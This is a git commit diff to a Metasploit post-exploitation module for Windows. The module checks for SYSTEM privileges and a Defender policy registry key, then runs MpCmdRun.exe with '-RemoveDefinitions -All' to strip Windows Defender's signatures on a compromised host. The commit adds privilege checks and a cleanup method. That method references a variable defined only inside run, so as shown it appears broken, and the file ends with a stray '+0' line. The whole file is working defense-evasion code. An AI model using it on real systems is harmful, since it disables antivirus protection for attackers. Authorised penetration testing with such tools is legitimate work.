Add more checks and a cleanup function

2018-11-29 10:39:46 -06:00 · 2018-11-29 10:39:46 -06:00 · 1304f93f1f
parent 7f26364d5b
commit 1304f93f1f
1 changed files with 33 additions and 5 deletions
--- a/modules/post/windows/manage/disable_windowsdefender_signatures.rb
+++ b/modules/post/windows/manage/disable_windowsdefender_signatures.rb
@ -6,6 +6,7 @@
 class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::Registry

  def initialize(info={})
    super( update_info( info,
@ -24,16 +25,43 @@ class MetasploitModule < Msf::Post
      'Platform'      => [ 'win' ],
      'SessionTypes'  => [ 'meterpreter' ],
      ))
+    register_options(
+      [
+        OptBool.new('AUTO_CLEANUP', [ true, 'Attempt to return protections after session exit', true ])
+      ])
+
  end

  def run
-    unless is_system?()
-      print_status("Remove Definitions Windows Defender")
-      file_path = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"
-      if exist?(file_path)
-        cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -RemoveDefinitions -All")
+    #Are we system?
+    if not is_system?()
+      fail_with(Failure::NoAccess, "You must be System to run this Module")
+    end
+    #Is the binary there?
+    program_path = session.sys.config.getenv('ProgramFiles')
+    vprint_status("program_path = #{program_path}")
+    file_path = program_path + '\Windows Defender\MpCmdRun.exe'
+    vprint_status("file_path = #{file_path}")
+    if not exist?(file_path)
+      fail_with(Failure::NoAccess, "#{file_path} is not Present")
+    end
+    #Is defender even enabled?
+    defender_disable_key = "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender"
+    disable_key_value = meterpreter_registry_getvalinfo(defender_disable_key, "DisableAntiSpyware", REGISTRY_VIEW_NATIVE)
+    if disable_key_value.nil? || disable_key_value != 1
+      print_status("Removing All Definitions for Windows Defender")
+      cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -RemoveDefinitions -All")
+      if cmd.include?('denied')
+        print_bad("#{cmd}")
+      else
        print_status("#{cmd}")
      end
+    else
+      fail_with(Failure::BadConfig, "Defender is not Enabled")
    end
  end
+  def cleanup
+    cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -SignatureUpdate")
+  end
 end
+0